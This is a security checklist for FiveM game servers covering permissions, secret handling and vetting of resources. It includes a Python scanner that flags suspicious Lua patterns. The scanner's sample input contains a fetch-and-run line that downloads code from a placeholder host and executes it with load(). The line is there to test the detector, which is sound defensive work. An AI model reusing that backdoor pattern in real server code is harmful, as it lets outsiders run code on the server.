Server security baseline
Most beginner servers are not hacked by geniuses. They leak a license key on Discord, give every staffer god-mode, run a random script with a backdoor, or post their database webhook in a public channel. This is the baseline that closes those doors. Treat it as a checklist you run before you ever go public, and again after any big change.
The baseline
Give permissions by role, not by person
Use ACE permissions and groups so you can add or remove a staffer in one line. Grant the narrowest power that does the job; only owners get command.* style access.
add_ace group.admin command allow
add_principal identifier.fivem:00000 group.admin
In txAdmin, give moderators a limited role, not full admin. Review the admin list monthly and remove anyone who left.
Keep secrets out of the repo and out of chat
License key, database password, and Discord webhooks are secrets. Read them at runtime with convars in server.cfg (which is not in your public repo) and never paste them in Discord, screenshots, or videos. If one leaks, rotate it the same hour.
Trust only resources you can read or vouch for
Every resource you ensure runs with full server power. Install from the official author only. Skim server-side files for suspicious PerformHttpRequest calls to unknown URLs, base64 blobs, or load()/assert(load(...)) running fetched code. If you cannot read it and cannot trust the source, do not run it.
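The skim described above can be partly automated before you read the files by hand. The following Python script is an added example, not part of the original lesson or of any FiveM tooling; the rule names, the ALLOWED_HOSTS list and the sample Lua text are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts your own resources are expected to contact; edit for your server.
ALLOWED_HOSTS = {"discord.com"}

HTTP_LITERAL = re.compile(r"PerformHttpRequest\s*\(\s*(['\"])(.*?)\1")
# load(...) / loadstring(...) as bare calls, not methods such as json.load(...)
DYNAMIC_LOAD = re.compile(r"(?<![\w.:])(?:load|loadstring)\s*\(")
# A quoted run of 80+ base64-alphabet characters
BASE64_BLOB = re.compile(r"['\"][A-Za-z0-9+/]{80,}={0,2}['\"]")


def scan_lua(source):
    """Return (line_number, rule) findings for the text of one server-side Lua file."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        literal_urls = list(HTTP_LITERAL.finditer(line))
        for match in literal_urls:
            try:
                host = urlparse(match.group(2)).hostname or "?"
            except ValueError:  # malformed URL literal
                host = "?"
            if host not in ALLOWED_HOSTS:
                findings.append((number, "http-unknown-host:" + host))
        if "PerformHttpRequest" in line and not literal_urls:
            # URL comes from a variable or convar: needs a manual look
            findings.append((number, "http-dynamic-url"))
        if DYNAMIC_LOAD.search(line):
            findings.append((number, "dynamic-load"))
        if BASE64_BLOB.search(line):
            findings.append((number, "base64-blob"))
    return findings


# Constructed sample input; the hosts, webhook path and blob are placeholders.
SAMPLE = (
    'local hook = GetConvar("log_webhook", "")\n'
    'PerformHttpRequest("https://discord.com/api/webhooks/ID/TOKEN", function() end, "POST", "{}")\n'
    'PerformHttpRequest("https://cdn.example.net/v", function(code, body)\n'
    '    assert(load(body))()\n'
    'end)\n'
    'local blob = "' + "QUJD" * 24 + '"\n'
)

if __name__ == "__main__":
    for number, rule in scan_lua(SAMPLE):
        print(f"line {number}: {rule}")
```

A hit is a prompt to open the file and read that line, not a verdict. Obfuscated code can evade simple patterns, so a clean scan does not replace knowing and trusting the source.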
Lock down webhooks and logging
Store webhook URLs in convars, send them only from the server side, and never expose them to clients. Anyone with the URL can post to that channel, so treat it like a password.